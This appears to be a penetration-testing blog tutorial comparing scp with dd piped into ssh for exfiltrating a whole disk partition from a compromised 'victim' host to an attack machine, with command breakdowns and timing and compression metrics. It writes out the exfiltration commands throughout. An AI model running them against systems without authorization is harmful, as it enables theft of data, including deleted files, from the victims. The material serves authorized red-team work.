Introduction
Sometimes, when looking through files for useful information after exploiting a box, you might run into a small file system or a particularly interesting disk partition. Due to time constraints and the need for specialized analysis tools, it might be helpful or even necessary to exfiltrate the entire partition. In these cases, we can combine the powers of dd as a data duplication tool and ssh as a means of securely and reliably transferring data, efficiently bringing the remote partition to our local attack machine.
Methods Covered in this Section
- scp Recursive File Transfer via Secure Shell:
scp -C -r /data/ root@10.0.0.5:/root/Desktop/data
- dd + ssh Compressed Data Exfil over Encrypted Channel:
dd if=/dev/sdb1 bs=65536 conv=noerror,sync | ssh -C root@10.0.0.5 "cat > /root/Desktop/data.dd"
Take, for example, the output of a df command on a compromised host showing a dedicated partition (here, /dev/sdb1) mounted on /data.
Assuming the device mounted at /data holds interesting information and we want all of it for further analysis, we can recursively copy it over with scp:
scp Recursive File Transfer via Secure Shell:
scp -C -r /data/ adhd@10.0.0.210:/home/adhd/Desktop/data
Command Breakdown
scp -C -r /data/ adhd@10.0.0.210:/home/adhd/Desktop/data
1. scp - Command line tool for file transfer via Secure Shell
2. -C - Enables ssh's compression
3. -r - Recursively copies all files, directories, and links
4. /data/ - Local directory to be transferred
5. adhd@10.0.0.210: - Destination user@IP
6. /home/adhd/Desktop/data - Destination folder to copy the files into
This provides a file-by-file copy mechanism that will bring copies of all files in the /data directory back to the pentester's system. Measuring performance in terms of time, bandwidth used, and data pulled across multiple executions provided the following metrics:
Execution time: 23.643s - Data brought to attack system: 684,756,992 bytes - Bytes on wire: 719,593,027
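As a sketch of how metrics like these might be collected on a Linux attack box: wall-clock time can be taken around the command, and approximate on-wire bytes read from the kernel's per-interface TX counters. The interface name and the measured command below are placeholders, not part of the original test setup.

```shell
#!/bin/sh
# Sketch: wrap a transfer command to report elapsed time and TX bytes.
# IFACE is a placeholder; on a real attack box it would be eth0 or similar.
# Note the TX counter includes any other traffic on the interface, so the
# byte figure is approximate.
IFACE="${IFACE:-lo}"

measure() {
    tx0=$(cat "/sys/class/net/$IFACE/statistics/tx_bytes")
    t0=$(date +%s%N)
    "$@"
    t1=$(date +%s%N)
    tx1=$(cat "/sys/class/net/$IFACE/statistics/tx_bytes")
    awk -v a="$t0" -v b="$t1" 'BEGIN { printf "Elapsed: %.3fs\n", (b - a) / 1e9 }'
    echo "Bytes on wire (approx): $((tx1 - tx0))"
}

# Usage against the article's example target:
# measure scp -C -r /data/ adhd@10.0.0.210:/home/adhd/Desktop/data
```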
Doing a quick comparison, we can see that scp's compression on our test dataset (~685 MB of random data split into 653 files) was completely ineffective. In fact, the compression actually bloated the amount of data transmitted on the wire: data sent was approximately 105% of the size of the data on disk.
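This result is easy to reproduce locally: gzip (the same DEFLATE-style compression that ssh -C applies) cannot shrink random bytes, while highly redundant data collapses to almost nothing. A quick sanity check, using temporary paths of our own choosing:

```shell
# Random bytes are incompressible; null bytes compress almost completely.
head -c 1048576 /dev/urandom > /tmp/rand.bin
head -c 1048576 /dev/zero    > /tmp/zero.bin

gzip -c /tmp/rand.bin | wc -c   # typically slightly LARGER than 1 MB
gzip -c /tmp/zero.bin | wc -c   # on the order of 1 KB
```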
Maybe dd + ssh will provide a superior alternative?
By using the dd command we can perform a byte-by-byte copy of the underlying partition that is mounted to the /data directory. Copying data this way will bring back the entire partition, slack space included, so that disk forensics tools can even be used to recover data that has been deleted from the victim machine.
dd + ssh Compressed Data Exfil over Encrypted Channel:
dd if=/dev/sdb1 bs=65536 conv=noerror,sync | ssh -C adhd@10.0.0.210 "cat > /home/adhd/Desktop/data.dd"
Command Breakdown Cont.
dd if=/dev/sdb1 bs=65536 conv=noerror,sync | ssh -C adhd@10.0.0.210 "cat > /home/adhd/Desktop/data.dd"
1. dd - Command line tool to copy files byte-by-byte
2. if=/dev/sdb1 - Input file; specifies the file (here, the raw partition) to be copied
3. bs=65536 - Block size; read and write up to 65,536 bytes at a time
4. conv=noerror,sync - Conversion options: noerror continues after read errors; sync pads short reads with null bytes to the full block size
5. | - Pipes dd's output into the ssh command
6. ssh - Command line tool to connect to remote systems via Secure Shell
7. -C - Enables ssh's compression
8. adhd@10.0.0.210 - Destination user@IP
9. "cat > /home/adhd/Desktop/data.dd" - Destination file the image is written into
In the above dd command we use the input file switch (if=) to specify the source for duplication (in this case /dev/sdb1, the underlying partition mounted on /data). The block size (bs=) argument sets how many bytes dd reads and writes at a time. Because the output of this dd command is piped (via the | operator) into the ssh command to stream data to the attack station, we specified 65536 bytes; this matches the default pipe buffer capacity on Linux, though that capacity varies across systems. The convert (conv=) arguments noerror and sync are commonly used when making backup images. They allow dd to continue image creation when read errors occur and to replace the missing data with null bytes, preserving as much of the original image as possible while keeping data aligned at its original offsets. For performance statistics the above command was run multiple times and yielded the following metrics:
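The padding behavior of conv=sync is easy to see in isolation with a toy block size:

```shell
# A 3-byte input read as one partial 8-byte block is padded with null
# bytes to the full block size, so the output is exactly 8 bytes.
printf 'abc' | dd bs=8 conv=sync 2>/dev/null | wc -c   # prints 8
```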
Execution time: 23.726s - Data brought to attack system: 1,072,693,248 bytes - Bytes on wire: 723,521,089
So with dd + ssh running on the same dataset of completely random data, compression paid off: data transmitted was approximately 67% of the size of the full image. The random file contents themselves are incompressible; the savings most likely come from the unused (largely zeroed) space in the partition image, which compresses extremely well. Additionally, the execution time was only 0.083 seconds slower despite the 56.6% larger byte-by-byte disk image that was transferred.
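These ratios can be rechecked directly from the raw byte counts reported above:

```shell
# Recompute the compression and size-overhead ratios from the raw counts.
awk 'BEGIN {
    disk = 684756992        # dataset size on disk (scp test)
    img  = 1072693248       # full partition image pulled by dd
    wire = 723521089        # bytes on wire for dd + ssh
    printf "wire vs image:    %.2f%%\n", 100 * wire / img         # ~67%
    printf "image vs dataset: +%.2f%%\n", 100 * (img / disk - 1)  # ~56.6%
}'
```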
Conclusion
In additional testing the dd + ssh option continued to perform well. Even against standalone files, dd + ssh performance was nearly identical to or better than the scp alternative. While this won't hold true in every scenario, and there are definitely cases where scp would be the better option, dd + ssh provides a robust solution for controlled, compressed, and encrypted mass data transfer.
Matthew Toussain
https://twitter.com/0sm0s1z